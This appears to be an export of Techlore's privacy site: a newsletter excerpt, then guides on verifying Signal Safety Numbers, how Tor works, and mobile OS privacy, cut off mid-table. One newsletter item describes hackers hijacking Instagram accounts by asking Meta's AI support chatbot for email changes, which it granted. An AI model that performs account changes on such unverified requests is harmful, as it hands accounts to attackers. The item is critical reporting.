Qwant, swapping Microsoft for Nextcloud, and Gmail for Tuta...this is all part of a broader European push toward digital sovereignty. **My take:** This is ultimately a geopolitical story, but the message is simple: if even entire countries are realizing the risk of depending on big tech, that's a signal these companies aren't just more powerful than individuals, they're more powerful than governments. The world is waking up to the harsh reality of the havoc these companies have caused (and continue to cause) and everyone's looking for a way off the sinking ship. **\~ Story 3: Hackers Hijacked Celebrity Instagram Accounts By Just Asking Meta's AI** In one of the most absurd stories of the year, hackers gained access to high-profile Instagram accounts by essentially just asking for an email change, and the AI complied. Meta has since started alerting affected users. **My take:** A support chatbot with the power to modify account details is a *reckless* design decision, and reflects Meta's lack of care for user safety. This is the same company firing real people in the effort to replace them with AI, the same company trying to add AI 'engagement' on their platforms to keep people engaged, the same platform knowingly exploiting children, the same platform who's CEO wants to AI-clone himself in meetings, and that same CEO won't even let his children use the platform. This story is just one more infuriating drop in the bucket of Meta's decades of controversies. --- ## This Week on Techlore 📺 This week we had a couple exciting pieces of content! To start, we had DuckDuckGo on Techlore Talks to discuss their role in the fight for digital rights: [DuckDuckGo’s Director of Product on Ads, Google, and the Ecosystem They’re Actually BuildingTechlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-025ee686-d496-4af6-ba4c-61a23ad0d1f2.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260530-DUCKDUCKGO-INTERVIEW-thumbnail-v1-a2dc65f4-c0cb-4cdc-a967-6d92f645edc1.jpg)](https://techlore.tech/duckduckgos-director-of-product/) And we partnered with Cape, the private cellular provider, to make an in-depth guide on what all of us can realistically do to protect ourselves on cellular networks: [The Truth About Phone Carrier Tracking (It’s Worse Than You Think)Your cell carrier knows your name, your location, who you called, when you called them, how long you talked, and more. What’s worse, this data sits on their servers for years. VPNs and Signal help, but they don’t touch the infrastructure layer. Here’s what you can actually do, and how![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-4f046518-1d5c-4aab-8337-9be325567b6e.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/-300-For-Sale-YouTube-Thumbnail--3--d6bd8182-519e-41e1-9037-3a9b77049ee3.png)](https://techlore.tech/the-truth-about-phone-carrier-tracking-its-worse-than-you-think/) And finally, our SPA Tools are OFFICIALLY LIVE! Here's how it all comes together: ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/06/image.png) SPA Quiz, quiz.techlore.tech Take the [**SPA Quiz**](https://quiz.techlore.tech/) to discover your archetype. Carry it into [**SPA Tools**](https://tools.techlore.tech), where that same archetype filters the best tools for you. The [**VPN Finder**](https://vpn.techlore.tech/) puts your top VPN contenders side by side until the right choice is obvious. And any time you want to understand *why,* the brand new [**SPA Wiki**](https://wiki.techlore.tech/) is right there for you to learn. I'll be doing more formal announcements for these soon, they took months of effort and I wish I had access to these tools when I started my journey. --- ## Action Item ✅ Take two minutes this week to check your password manager's master password. If it's anything short, reused, or guessable, change it to something long, unique, and random, ideally a passphrase you can actually remember. The Dashlane breach is a reminder that an encrypted vault only protects you as well as the password locking it. #### This Week's Sources ****Highlight: Dashlane Confirms Hackers Stole Customer Password Vaults** - - ****Story 1: Pentagon Confirms US Troops Targeted With Commercial Location Data — Senator Calls Ad Industry a National Security Threat** - ****Story 2: Europe Pulls Away From US Tech — Parliament Drops Google, France Refuses RCS E2EE, Euro-Office Launches With Tuta** - - - - - ****Story 3: Hackers Hijacked Celebrity Instagram Accounts by Tricking Meta's AI Support Chatbot** - - - ****The Defense Bulletin** **Data Breaches* - - - - - - - **Threats* - - - - - - - - - - - - - - - **FOSS+ Updates* - - - - - - - - ### The Truth About Phone Carrier Tracking (It's Worse Than You Think) URL: https://techlore.tech/the-truth-about-phone-carrier-tracking-its-worse-than-you-think/ Last updated: 2026-06-02T20:18:42.000Z Your cell carrier knows your name, your location, who you called, when you called them, how long you talked, and more. What's worse, this data sits on their servers for years. VPNs and Signal help, but they don't touch the infrastructure layer. Here's what you can actually do, and how Cape is trying to change things. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### How to Verify Signal Safety Numbers URL: https://techlore.tech/how-to-verify-signal-safety-numbers/ Last updated: 2026-07-19T02:12:40.000Z ## 📖 The Basics ### What It Is A Safety Number is a unique fingerprint assigned to every Signal conversation. It's the same number for both people in the conversation, generated from both parties' cryptographic keys. If your Safety Number matches your contact's, you're confirmed to be exchanging encrypted messages directly with each other, with no one intercepting or substituting keys in the middle. You can find the Safety Number for any conversation by opening it in Signal, tapping the contact's name at the top, and selecting **View Safety Number**. ### How It Works #### Why Safety Numbers Exist End-to-end encryption protects the content of your messages from being read in transit. But it requires trusting one thing: that the public key your app received for your contact actually belongs to them. In theory, a compromised server or a sufficiently sophisticated attacker could substitute their own key into that exchange, letting them silently read messages both parties believe are private. This is a man-in-the-middle attack, and it's the one threat that encryption alone doesn't neutralize. Safety Numbers exist specifically to close this gap. By comparing a fingerprint derived from both parties' keys through an independent, out-of-band channel, you verify that no substitution has occurred. If the numbers match, the key exchange was clean. #### Verifying In Person This is the best method, and it's fast. Both people open the conversation in Signal, tap the contact name, and select **View Safety Number**. One person taps the QR code to scan, and the other holds their screen up. Signal confirms the match instantly. Mark the contact as verified, and you're done. #### Verifying Digitally If you can't meet in person, you need an already-established safe channel outside of Signal like email, a different messaging app, a video call, anything where you've already confirmed the other person's identity. One person sends the other their raw Safety Number through that channel. **Important:** The person doing the verifying, the one who received the first Signal message and wants to confirm who reached out...should be the one *receiving* the Safety Number, not sending it. If you send your Safety Number to the person you're trying to verify, they can simply echo it back, since it's the same number for both of you. You only get one shot at meaningful verification. Wait for them to send it to you unprompted, then compare. Once you've confirmed the numbers match, tap **Mark as Verified** in the conversation. Signal will display a small verified indicator in the chat. #### What Happens When Safety Numbers Change If something changes on either side of the conversation like a new device, a reinstall, or a SIM transfer, Signal will alert you that the Safety Number has changed. This doesn't automatically mean something is wrong. Most Safety Number changes are completely innocent: your contact got a new phone. But it does mean you should re-verify before continuing any sensitive conversation. A changed Safety Number that your contact can't explain is a reason to pause. #### Switching Devices Without Drama Whether your Safety Numbers change at all when switching devices depends on *how* you switch, and Signal gives you methods that avoid triggering the change entirely. Methods that preserve your Safety Numbers: - **Signal's built-in account transfer** (phone to phone, same OS): Using Signal's "Transfer or restore account" flow during setup carries your identity keys over to the new device. Your contacts won't see a Safety Number change because the keys that generate it haven't changed. - **Linked devices** (Desktop, iPad): Adding a desktop or iPad as a [linked device](https://support.signal.org/hc/en-us/articles/360007320551-Linked-Devices) doesn't change your Safety Numbers at all since linked devices share your phone's keys. Signal also now supports syncing your message history when first linking a device—including media from the last 45 days—so you don't start blank. However, a fresh registration where you install Signal on a new phone, enter your number, and skip the transfer flow—generates entirely new identity keys. This is the scenario that changes Safety Numbers and sends alerts to all your verified contacts. Avoid this if you want a clean switchover. If a Safety Number change is unavoidable, it's recommended to do the following: 1. Verify Safety Numbers with your important contacts *before* switching. 2. Let those contacts know you're switching devices so they expect the change and don't assume the worst. 3. After the switch, re-verify with those same contacts. 4. Keep a secondary safe channel established with anyone you communicate with sensitively, so you have somewhere to check in if something unexpected happens. #### Not Just Signal: Apple's Equivalent Signal isn't the only app with this feature. Apple added [**Contact Key Verification**](https://support.apple.com/en-us/118246) to iMessage. You can compare verification codes with a contact in person or over another trusted channel, or share a Public Verification Code that others save to your contact card. Once set up, iMessage automatically alerts you if a contact's keys change or an unrecognized device joins their account—the same continuous-verification principle described throughout this guide. If you and your contacts live in iMessage rather than Signal, it's worth turning on. --- ## 🎯 Why It Matters Here's an example from my own experience. Techlore gets a fair number of outreach messages, including from people who say they represent a project and want to have a sensitive conversation on Signal. Someone messages me on Signal claiming to be the CEO of a browser, search engine, VPN, or another privacy tool. The message says "Hey, it's \[name\], let's chat here." The way I handle this: I ask them to send our Safety Number through an already-established channel, like maybe an email thread we've been using. But here's the important nuance. Matching Safety Numbers doesn't prove the person emailing me is who they claim to be...I still have to trust that the email account is actually theirs. What it *does* prove is that the Signal conversation I'm in is cryptographically tied to the same identity as whoever sent that email. And once verified, Signal will alert me if that ever changes. That's the real power: not just a one-time handshake, but ongoing cryptographic assurance that I'm talking to the *same party* every time I open that thread. This is what Safety Numbers are actually for. The initial verification still has to come from a trusted person, and Safety Numbers don't replace that. What they do is lock in and continuously verify that the Signal conversation stays connected to that same identity over time. For any situation where impersonation or account compromise would be genuinely damaging, it takes thirty seconds to set up and runs silently in the background from then on. --- ## 💡 Common Misconceptions ### "If Signal is encrypted, I don't need to verify anything." Encryption protects message content from being read in transit. It doesn't protect against a scenario where the keys themselves have been substituted. Safety Number verification is the check that confirms the key exchange was clean. The two protections are complementary, not redundant. ### "I should send my Safety Number to the person I'm trying to verify." This is the most common mistake. Both parties in a Signal conversation have the same Safety Number, so if you send it first, the other person can simply read it back to you. The person doing the verifying should wait for the other party to independently send the number through a separate channel, then compare. ### "A changed Safety Number means my contact has been compromised." Usually it just means they got a new phone, reinstalled Signal, or transferred their number to a new SIM. Safety Number changes are a prompt to re-verify, not a conclusion. Check in with your contact through your secondary safe channel, confirm the reason for the change, and re-verify. That's the full process. ### "This is only relevant for journalists and activists." Verification is most critical at higher threat levels, but the underlying value is universal: knowing you're actually talking to who you think you're talking to. Confirming a business contact before sharing a sensitive document, or verifying a new contact who claims to be a mutual friend, are both reasonable uses. The tool is there; the threshold for using it depends on your situation. --- ## 🗣️ Henry's Take I wrote this guide because even technically literate people were getting confused about what Safety Numbers are for and, more importantly, who's supposed to send the number first. My practice is to verify in-person whenever I can, it's a ten-second process and it's the strongest form of verification available. For contacts I can't meet physically, I use a trusted secondary channel. The worst time to figure out your re-verification process is after you've already switched phones and your contacts are seeing unexpected Safety Number changes and wondering what happened. A short heads-up message through a secondary channel before you switch, and a re-verification after, keeps everything clean. --- ## ✅ Henry's Picks - [**Signal**](https://signal.org): the app this entire article is about. Free, open source, independently audited, and the gold standard for encrypted messaging. Safety Numbers are built into every conversation. - [**Signal's own explainer on Safety Numbers**](https://support.signal.org/hc/en-us/articles/360007060632-What-is-a-safety-number-and-why-do-I-see-that-it-changed): the official documentation, worth reading alongside this. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### How the Tor Network Works and When to Use It URL: https://techlore.tech/how-the-tor-network-works-and-when-to-use-it/ Last updated: 2026-07-19T02:11:19.000Z ## 📖 The Basics ### What It Is Tor (The Onion Router) is a network of thousands of volunteer-operated relay servers that anonymizes internet traffic by routing it through multiple hops before it reaches its destination. [The Tor Project](https://www.torproject.org), a US nonprofit, maintains the software and supports the network, but anyone can run a Tor node to become part of it. The [Tor Browser](https://www.torproject.org/download/) is their most accessible tool, it's a hardened version of Firefox that combines the network piece (Tor) with the software (Browser) to blend users together and make them appear the same to outside observers. The network serves millions of users, and projects like [Tails](https://tails.net) and [Whonix](https://www.whonix.org) build on top of it with additional protections. ### How It Works #### Onion routing: Step by step When you connect to Tor, your Tor client selects three nodes: a guard node, a middle relay, and an exit relay. It then builds a circuit through the three nodes, establishing an encrypted connection with each in sequence. Your traffic is wrapped in three layers of encryption, one for each relay, like layers of an onion 🧅. Each layer can only be decrypted by the relay it's addressed to, which then removes its layer and passes the remaining encrypted payload to the next hop. At no point does any single relay see the complete picture. Here's a breakdown: - The **guard node** (entry relay) knows your real IP address. It's the first hop and receives your connection directly. It can see you're using Tor. It cannot see where you're going or what you're doing. - The **middle relay** knows only that it received encrypted traffic from the guard node and should pass it to the exit relay. It knows neither your real IP nor your destination. - The **exit relay** decrypts the final layer and connects to your actual destination, typically the website or service you're trying to reach. It can see the destination and the content of unencrypted traffic. It cannot see your real IP address; it only knows the middle relay. #### Exit nodes and why they matter The exit relay is the one that connects to the open internet on your behalf. This has two implications: 1. If you're connecting to a site over plain HTTP (not HTTPS), the exit relay can read that traffic. Always prioritize HTTPS, Tor Browser will warn you when connections are unencrypted. 2. It's important to remember that exit relays are run by volunteers with varying motivations. A malicious exit relay can observe unencrypted traffic. This is why onion services, where neither party ever exits to the open internet, provide stronger protection for high-stakes communication. #### Onion services (.onion addresses) Tor also supports services that exist entirely within the network. When you access a `.onion` address, your traffic never leaves Tor. There's no exit relay reaching the open internet, and the server's IP is never exposed to any outside observer. Both sides remain within the network. > 💡 Fun fact: colloquially, this is what the 'dark web' refers to: sites hosted as .onion addresses. I like to highlight the organizations that run a .onion site to push back against the negative association. #### Bridges and censorship circumvention In countries where Tor is blocked at the network level, [bridges](https://bridges.torproject.org) provide an alternative. These are unlisted relay entries not published in the main directory. Several pluggable transports disguise what Tor traffic looks like to network observers. **obfs4** makes traffic appear random. **WebTunnel** disguises Tor traffic as ordinary HTTPS. **Snowflake** routes through browser-based WebRTC proxies run by volunteers, creating a distributed network that's hard to block at scale. [Since July 2025, WebTunnel and Snowflake have seen significantly increased adoption in Russia following obfs4 blocks on major mobile ISPs](https://forum.torproject.org/t/tor-project-user-support-report-for-december-2025/21100). If you want to help, you can [run Snowflake yourself as a browser extension](https://snowflake.torproject.org). #### Tor Browser vs. Brave's Tor mode (and other implementations) [Brave](https://brave.com) includes a "Private Window with Tor" feature that routes browser traffic through the Tor network. While it routes you through Tor, it's not a Tor Browser equivalent. Tor Browser is specifically designed to anonymize users on the Tor network through hardened fingerprinting resistance, per-site circuit isolation, specific security settings, and protections developed to prevent browser-level deanonymization. Brave's Tor mode provides routing, but without that full software-side hardening. This isn't a knock on Brave. It's a common pattern with many third-party services, like [Orbot](https://orbot.app) or [Cake Wallet](https://cakewallet.com) that use the Tor network without guaranteeing the same anonymity found in tools like the official Tor Browser, [Whonix](https://www.whonix.org) or [Tails](https://tails.net) which are specifically designed for blending users together. So while third-party tools like Brave's Tor Windows still provide protection when they route through Tor, just know it's not the *same* anonymity guarantees. #### What Tor protects against and what it doesn't Tor protects against your ISP seeing which sites you visit, websites seeing your real IP address, and network-level observers correlating your browsing destinations to your identity. It does not protect against: - Your own behavior. Logging into any account linked to your real identity connects that session to you, regardless of the network routing. - A compromised device. Malware running before your session sees your activity regardless of which network you use. - Traffic correlation or timing analysis attacks by well-resourced adversaries monitoring relay infrastructure over time. #### Is using Tor legal? In most countries like the US, UK, Canada, EU, Australia, and others—using Tor is fully legal. It's used by journalists, researchers, activists, and ordinary people who don't want their browsing tracked. A small number of countries—China, Iran, Russia, Belarus, Turkmenistan, and a handful of others—either block Tor or treat its use as suspicious. If you're in one of those jurisdictions, bridges and pluggable transports exist to help support you. Like many services in this wiki: Tor is a tool, and the legality maps to what you do with it, not to the fact that you opened the browser. In free countries, opening Tor Browser is no different from opening Firefox or Brave. #### Downloading safely Download Tor Browser only from [torproject.org](https://www.torproject.org/download/) as fake versions aren't uncommon. The official project also distributes signed releases for anyone who wants to verify the download cryptographically; the [installation guide](https://support.torproject.org/tbb/how-to-verify-signature/) walks through the process. If torproject.org itself is blocked where you are, they maintain a [GetTor email service](https://gettor.torproject.org) that sends signed links to alternate mirrors. Try to avoid installing Tor Browser from an unofficial third party. --- ## 🎯 Why It Matters [In 2024, German investigative journalists revealed that the BKA, Germany's federal police, had successfully deanonymized a Tor user through timing analysis](https://www.theregister.com/2024/09/19/tor%5Fpolice%5Fgermany/). Over two to three years, they monitored specific relay nodes, correlated traffic patterns, obtained ISP subscriber data through legal process, and identified an administrator of a dark web platform. The case prompted a wave of "is Tor broken?" coverage. [The Tor Project's assessment was no](https://blog.torproject.org/tor-is-still-safe/). The attack didn't compromise Tor's cryptography or the network's core design. It exploited an outdated version of Ricochet, a messaging application the target was using, which lacked a protection called Vanguards-lite specifically designed to defend against guard discovery attacks. Current versions include that protection. The reality is it took years of timing analysis by a national police agency against a specific target running outdated software to deanonymize one Tor user. For most of you reading this, that's probably not your threat model. For the small minority where it is, the lesson is to keep your software current and understand your operational security, not abandon the tool. Tor matters most where other tools fall short. A VPN shifts trust from your ISP to a VPN provider. Tor distributes that trust across three independent relays where no single entity holds enough information to link your identity to your destination. For situations where you genuinely cannot afford to trust any single provider, this architectural difference is extremely important. But it's not only for advanced threat models...for research on sensitive topics, accessing services without revealing your location, or visiting onion services where neither party's IP is exposed, Tor provides protection that no VPN or private browsing mode can replicate. It's slower, and some sites block Tor exit nodes, but those are the tradeoffs for a powerful tool of free expression. --- ## 💡 Common Misconceptions ### "Tor is broken or compromised." Every few years a high-profile deanonymization case generates "Tor is broken" coverage, but the actual facts rarely match the headlines. The most recent test case, the 2024 BKA investigation referenced in the previous section, didn't compromise Tor's cryptography or its core network design. That doesn't make Tor a perfect tool, but it does mean the realistic threat model for nearly every Tor user is not the one the headlines imply. ### "Tor is only for the dark web, and the dark web is only for criminals." The phrase "dark web" colloquially means onion services, and the criminal association exists, but the actual makeup of who uses these is broader and less interesting than the framing suggests. The [New York Times](https://open.nytimes.com/https-open-nytimes-com-the-new-york-times-as-a-tor-onion-service-e0d0b67b7482), [The Guardian](https://www.theguardian.com/help/insideguardian/2022/may/30/guardian-launches-tor-onion-service), [ProPublica](https://www.propublica.org/nerds/a-more-secure-and-anonymous-propublica-using-tor-hidden-services), the BBC, and [SecureDrop](https://securedrop.org) all run onion services. Activists in censored regions use Tor to reach the open web. Journalists use it to protect sources. Researchers use it to access information without leaking what they're looking into. The reality is Tor can be used by anyone, and the more of us who step up to use it, the more we break the criminal association. ### "Tor is too advanced for everyday users." Tor has a reputation for being an advanced tool. And while it *technically* is, the reality is downloading Tor Browser, opening it, and using it to look something up is genuinely a one-step operation. There's no separate VPN to configure, no DNS to change, no extension to install. Both the network anonymization and the local hardening (anti-fingerprinting, no persistent state) are bundled into a single tool that works out of the box. It's slower than a regular browser, and some sites block exit nodes, but the benefit-to-effort ratio is actually quite solid—at least that's my optimistic perspective. ### "You should always pair Tor with a VPN for extra anonymity." This is one of the most persistent debates around Tor, and my take on this is more nuanced than a simple yes or no. For most people, Tor Browser by itself is the right call, and stacking a VPN on top does not make you more anonymous toward the sites you visit. But there can be some positive and negative impacts depending on how you approach this. - **VPN → Tor** (you connect to a VPN first, then Tor runs on top). This has some real potential arguments behind it, *if* you're using a reputable no-logs provider like [Mullvad](https://mullvad.net) or [IVPN](https://www.ivpn.net). *The potential benefit:* your ISP and local network see only an encrypted connection to a VPN, which obfuscates your Tor usage. *The cost:* you hand a lot of trust to the VPN, who can now see both your real IP and the fact that you're connecting to Tor. This does **not** improve your anonymity toward the destination, which still only ever sees the Tor exit node. The benefit is purely on the entry side. It's also worth knowing the Tor Project built [bridges and pluggable transports](https://bridges.torproject.org) for exactly the same goal of hiding Tor use, and those keep the trust inside the Tor network rather than handing it to a commercial company. - **Tor → VPN** (traffic exits Tor and then passes through a VPN before reaching the destination). *The narrow pro:* it gives you a consistent exit IP and can reach sites that block Tor exit nodes. *The cons:* it's genuinely tricky to set up correctly, it ties your Tor activity to a VPN account that can often be linked back to you, and done wrong it can undermine the very anonymity Tor gave you. For the overwhelming majority of people, Tor Browser alone is the answer. A trusted VPN in front of Tor is a reasonable defense-in-depth choice for people who specifically need to hide they're using Tor, and accept that they're shifting trust to the VPN. If you're unsure which camp you're in, you're almost certainly in the "Tor Browser alone" camp. ### "The U.S. government created Tor, so it's controlled by the U.S. government." The first half is true and the second half is harder to follow. Onion routing was researched at the [U.S. Naval Research Laboratory in the mid-1990s](https://www.torproject.org/about/history/) by David Goldschlag, Mike Reed, and Paul Syverson, with Roger Dingledine joining in the early 2000s and coining the name "Tor." The network launched publicly in October 2002, the code went open source, and the [Tor Project became an independent 501(c)(3) nonprofit in 2006](https://www.torproject.org/about/history/). It still receives some U.S. government funding alongside foundations and individual donors, and the project [publishes its sponsor list openly](https://www.torproject.org/about/sponsors/). But here's the thing: Tor is open source. Every line of code is public. The design is meant to distribute trust across 3 relays. Independent cryptographers have been auditing the protocol for over twenty years. More importantly: the U.S. government itself uses Tor for diplomats, intelligence assets, and military communications, which means a backdoor would compromise their own users alongside everyone else. The system only works if it works for everyone. ### "A huge percentage of Tor nodes are malicious, so it's not safe." This one has some truth to it since malicious relays are real, but the numbers vary wildly depending on the moment in time. Outside of large-scale attacks, peer-reviewed measurements have historically found malicious exits in the low single digits. For example, the [Chakravarty et al. 2014 study](https://researchwith.stevens.edu/en/publications/detection-and-analysis-of-eavesdropping-in-anonymous-communicatio) detected 14 malicious exit relays across 30 months of monitoring. But specific Sybil campaigns have done much more damage, like when a single actor running a campaign [controlled up to 23% of Tor exit capacity in May 2020](https://www.securityweek.com/malicious-actor-controlled-23-tor-exit-nodes/) and [over 27% in early 2021](https://thehackernews.com/2021/05/over-25-of-tor-exit-relays-are-spying.html). The [KAX17 actor](https://www.malwarebytes.com/blog/news/2021/12/was-threat-actor-kax17-de-anonymizing-the-tor-network), discovered in 2021, was running over 900 relays across guard, middle, and exit positions. These situations are quite alarming! But, deanonymizing a circuit requires the *same* actor to control multiple hops simultaneously, and even at KAX17's peak the chance of that for any single circuit was quite low. The other important note is the Tor Project actively removes malicious relays as they're found, and the situation is more like an ongoing whack-a-mole than a static "X% are bad" number. So this is worth following, but not currently a reason to outright avoid the tool. --- ## 🗣️ Henry's Take I treat Tor as a tool worth keeping installed even if it's rarely used. My case for this is simple: when you need it, you need it immediately! The setup cost of getting it ready in the moment is much higher than the cost of having it sitting in your dock unused. The other case for using it is the network benefits from healthy traffic, and the more ordinary, low-risk searches that route through it, the better the cover for the people who genuinely depend on it. For non-critical onion links that friends and viewers send to me, I'll sometimes open them in [Brave's Private Window with Tor](https://brave.com) to quickly preview them instead of using the Tor Browser. But for anything that actually matters, I use Tor Browser. On mobile, [Orbot](https://orbot.app) is genuinely underrated—it routes app traffic through Tor in a way that doubles as a free, trusted VPN for situations where you don't have one configured. And pro tip: If your workflows require an official Tor Browser for mobile, you will need to stay on Android as the Tor Browser options for iOS aren't as powerful. The closing point I'd make: for as much as people nitpick Tor (and the criticisms can be valid!), I don't think anybody has built anything better at this scale. A VPN concentrates trust in one provider. Tor distributes trust across three independent relays. That architectural property is what makes it irreplaceable. I2P is a wonderful project, but I still think in many ways it's not as mature as Tor for everyday people. So until I find a safer tool, I'll be continuing to use Tor. --- ## ✅ Henry's Picks [**Tor Browser**](https://www.torproject.org/download/): my primary recommendation for any situation where anonymity matters. Combines network routing through Tor with hardened anti-fingerprinting, per-site circuit isolation, and disabled features that would otherwise leak identifying information. Free, available on every major platform except iOS, which uses a less powerful version. [**Brave Private Window with Tor**](https://brave.com): a routing shortcut, not a Tor Browser substitute. Useful for casually opening onion links that aren't mission-critical, or just when you want a bit of extra network privacy on a website. I don't use this for anything where actual deanonymization would matter. [**Orbot**](https://orbot.app): for mobile, Orbot routes app traffic through the Tor network without requiring a Tor Browser per app. Doubles as a free, trustworthy VPN on Android and iOS for situations where you don't have a commercial VPN configured. Genuinely underrated, though remember it only offers the network-level protections by default. [**Tails**](https://tails.net): for situations where the local device shouldn't retain any trace of the session. Boots from a USB drive, runs entirely in RAM, routes everything through Tor by default. For higher threat models, it may be a good idea to always travel with a Tails USB ready to go so you can boot into it from any computer. [**Whonix**](https://www.whonix.org): a two-VM setup that isolates your workspace from the Tor gateway, providing strong protection against deanonymization through malware or application leaks. Higher friction than Tor Browser, but appropriate when isolation matters as much as network anonymity. Also can be used in conjunction with Qubes OS. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### iOS vs. Android vs. Custom ROMs: Mobile OS Privacy and Security Compared URL: https://techlore.tech/ios-vs-android-vs-custom-roms-mobile-os-privacy-and-security-compared/ Last updated: 2026-07-19T02:09:32.000Z ## 📖 The Basics ### What It Is Your mobile operating system controls what data your device collects, what permissions apps can access, what gets transmitted to whom, and what you can install or modify. [iOS](https://www.apple.com/ios/) is built by Apple, a company with its own data interests and prominent hardware business. [Android](https://www.android.com) is built by Google, which earns the majority of its revenue from advertising. The defaults they ship with reflect those origins, but things get quite interesting when you move beyond defaults. ### How It Works #### Stock iOS Apple has some genuine privacy strengths at the OS level. - [App Tracking Transparency](https://developer.apple.com/documentation/apptrackingtransparency) requires apps to ask explicit permission before tracking you across other apps and websites. - The permission model is well enforced: location (including approximate-only), microphone, camera, contacts and more all require explicit user consent. - Apple has a broader design philosophy of processing sensitive operations on-device rather than in the cloud, which shows up across multiple features like Apple Wallet (done on-device on iOS, but Google's version is handled in the cloud). Additionally, Apple has put real engineering effort into more advanced privacy & security features like [iCloud's Advanced Data Protection](https://support.apple.com/en-us/102651) (E2EE in most of iCloud) and [Lockdown Mode](https://support.apple.com/en-us/105120) (a hardened version of their OS designed to prevent government-sponsored spyware, which has been shown to be incredibly effective, with Apple stating in [March 2026 that it still has no record of a successful spyware compromise on any device with Lockdown Mode enabled](https://techcrunch.com/2026/03/27/apple-says-no-one-using-lockdown-mode-has-been-hacked-with-spyware/)). But there are some real limitations: - **iOS is a closed ecosystem.** Apps come exclusively from the App Store on standard devices (with limited EU exceptions under the Digital Markets Act). - Telemetry continues even with analytics disabled by default. Apple's privacy protections apply most forcefully to third parties, but not to what Apple itself collects through its own services. - Apple still doesn't treat VPNs as first-class citizens on iOS, with VPN leaks being a common side-effect. - Apple doesn't allow third-party browser engines on iOS, ultimately resulting in less powerful privacy browsers. - And finally, most of Apple's software is proprietary, so for some users that will supersede any potential benefits of the Apple ecosystem. With that said, for many people, iOS with deliberate permission management & privacy practices can be a reasonable baseline. A DNS filter to block Apple telemetry, Lockdown Mode, iCloud Advanced Data Protection, and a careful set of [privacy tools](https://tools.techlore.tech/) on top of that can take you quite far in the Apple ecosystem. #### Stock Android "Android" covers a wide range of manufacturer implementations. Google Pixel devices running stock Android are a clean baseline with less tracking than Samsung or carrier variants. But all stock Android variants still embed Google Play Services: a persistent background process with elevated system permissions that maintains an ongoing data connection to Google. It cannot easily be removed without fundamentally changing the OS. Recent Android versions have improved meaningfully with features like auto-revoke, which removes permissions from unused apps; one-time grants, which offer temporary access; and on-screen indicators that flag active microphone and camera use—but those still don't change the baseline data collection from Play Services. Additionally, Google designs a larger percentage of their ecosystem to be cloud-first, inherently putting more personal information online, whereas Apple leans towards local on-device processing when possible. But beyond what each company collects from their own services, another practical difference is third-party tracking, or what each app you install is able to collect. Generally speaking: iOS has more aggressively restricted what apps and advertisers can observe across your device, but that doesn't mean there aren't stronger solutions available on Android. #### Custom Android ROMs Android's open-source foundation ([AOSP](https://source.android.com)) makes it possible to build alternative operating systems that make different choices about what to include, remove, and harden. These are generally called custom ROMs. One of the important choices they make is how to handle Google app compatibility: - **Sandboxed Google Play** (used by [GrapheneOS](https://grapheneos.org)) runs Google Play Services as an unprivileged user-space app. No elevated system access, no permissions beyond what it explicitly requests. You can still use most apps, but Play Services can't conduct the device-wide scanning it performs on stock Android. - [**microG**](https://microg.org) (used by CalyxOS, /e/OS, and others) is an open-source reimplementation of Google Play Services. microG prioritizes open-source transparency and reducing Google code. Techlore's community project [Plexus](https://plexus.techlore.tech/) crowdsources which apps work with microG, so you can check before migrating. - **No compatibility layer**: nothing forces you to use one. Many ROMs (like [LineageOS](https://lineageos.org)) ship without one. This is the cleanest option, but with the steepest compatibility cost. [Plexus](https://plexus.techlore.tech/) shows both a microG score and a fully degoogled (no compatibility layer) score for each app. #### Some Custom ROM Options - [**GrapheneOS**](https://grapheneos.org): a hardened Android ROM with per-app network access controls, MAC address randomization per connection, auto-reboot after configurable idle periods, duress password support, and memory hardening beyond AOSP. Uses sandboxed Google Play for compatibility. Has historically run exclusively on Google Pixel devices due to strict security requirements. As of early 2026, [there has been a Motorola partnership announced for potentially more devices in the future](https://9to5google.com/2026/03/01/motorola-confirms-grapheneos-partnership-for-a-future-smartphone-porting-features/). - [**CalyxOS**](https://calyxos.org): uses microG, has historically had broader device support for devices like the Fairphone without additional hardening. Regarding microG: [their patch is locked down](https://calyxos.org/docs/guide/microg/) so that only the Google Play Services signature can be spoofed, and only by CalyxOS's bundled microG components for better security. As of early 2026, CalyxOS has not resumed regular public updates [following the departure of both its founder and tech lead in August 2025](https://calyxos.org/news/2025/08/01/a-letter-to-our-community/). [New signing infrastructure was audited by Trail of Bits in February 2026](https://calyxos.org/news/2026/02/24/calyxos-progress-update-2/) and updates are reported as close to resuming. - [**/e/OS**](https://e.foundation/e-os/)**,** [**LineageOS**](https://lineageos.org)**,** [**iodéOS**](https://iode.tech): support the widest range of devices including non-Pixel hardware. Meaningful improvements over manufacturer stock Android for privacy. The main drawback: they sometimes prioritize device compatibility over security features like verified boot, which helps keep your device safe from persistent malware. They do extend software (generally not firmware) updates for older devices, which is its own win. | Platform | OS Data Collection | Open Source | 3rd-Party Tracking Control | App Ecosystem & Play Services | Verified Boot | Compartmentalization | Device Compatibility | Gov Spyware Protection | Easy E2EE | | ---------------------------- | ----------------------- | ---------------------------------- | --------------------------- | ----------------------------------------------------------------- | ------------------------- | ------------------------------------------------- | --------------------------------------- | --------------------------------------------------- | -------------------------------------- | | **iOS** | 🔴 Apple | 🔴 Closed source | 🟢 Strong (ATT enforced) | 🔴 App Store only (limited EU exceptions) | 🟢 Enforced | 🔴 None | 🟡 Apple devices only | 🟢 Lockdown Mode (confirmed blocks spyware) | 🟢 iCloud ADP (backups, photos, notes) | | **Stock Android** | 🔴 Google Play Services | 🟡 AOSP open, Play Services closed | 🟡 Improving | 🔴 Play Services generally required; full store access + sideload | 🟢 Enforced (Varies) | 🟢 Work profiles + User Accounts | 🟢 Wide range of devices | 🟡 Android "Advanced Protection" | 🔴 No OS-level E2EE; app-level only | | **GrapheneOS** | 🟢 Minimal, auditable | 🟢 Open source | 🟢 Strong, per-app controls | 